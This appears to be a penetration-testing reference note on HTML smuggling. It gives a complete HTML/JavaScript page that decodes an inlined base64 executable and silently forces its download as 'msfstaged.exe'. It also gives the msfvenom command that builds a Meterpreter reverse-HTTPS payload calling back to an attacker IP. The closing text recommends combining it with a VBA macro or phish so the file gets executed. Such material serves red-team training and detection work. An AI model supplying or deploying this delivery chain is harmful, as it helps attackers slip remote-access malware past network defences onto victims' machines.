Backlink: reference-notes-readme


HTML Smuggling

<html>
    <body>
        <script>
          function base64ToArrayBuffer(base64) {
            // Decode a base64 string into an ArrayBuffer holding the raw bytes.
            // window.atob() returns a "binary string" with one character per byte
            // (every code unit < 256), so taking charCodeAt of each character
            // reproduces the bytes exactly.
            var decoded = window.atob(base64);
            var bytes = Uint8Array.from(decoded, function (ch) { return ch.charCodeAt(0); });
            return bytes.buffer;
          }
                // msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.119.120 lport=443 -f exe -o msfstaged.exe; base64 -w0 msfstaged.exe
                // The executable is inlined in the page as a base64 string. The value is
                // truncated here ('...') and the literal is never closed, so this listing
                // does not parse as written.
                var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAA...
                // Decode to raw bytes (base64ToArrayBuffer above) and wrap them in a Blob.
                var data = base64ToArrayBuffer(file);
                // NOTE(review): 'octet/stream' is not a registered MIME type
                // ('application/octet-stream' is); kept byte-identical here.
                var blob = new Blob([data], {type: 'octet/stream'});
                var fileName = 'msfstaged.exe';

                // Hidden anchor used only to trigger the download; it is appended to the
                // body and never removed afterwards.
                var a = document.createElement('a');
                document.body.appendChild(a);
                a.style = 'display: none';

                // Supported by Chrome/FireFox and Chromium Edge.
                // The file is handed to the browser via a blob: URL created in-page, with
                // the filename forced through the download attribute. This script makes
                // no request for the binary, so a network proxy never sees a file
                // download; the download is first observable at the browser
                // download-policy layer or as a file write on the endpoint, which is
                // where detection and blocking controls for this pattern belong.
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                // assumes click() has already started the download before the object
                // URL is revoked — TODO confirm for the browsers listed above
                window.URL.revokeObjectURL(url);

                // Supported by IE and pre-Chromium Edge
                //window.navigator.msSaveBlob(blob, fileName); // The user only has single 'Save' button
                //window.navigator.msSaveOrOpenBlob(blob, fileName); // User can save or open
        </script>
    </body>
</html>

The user will still have to run the file manually after it is downloaded. This could work well when combined with a VBA macro or some other phish served from the same page, which then executes the downloaded file instead of containing the malicious payload itself or calling out over the network.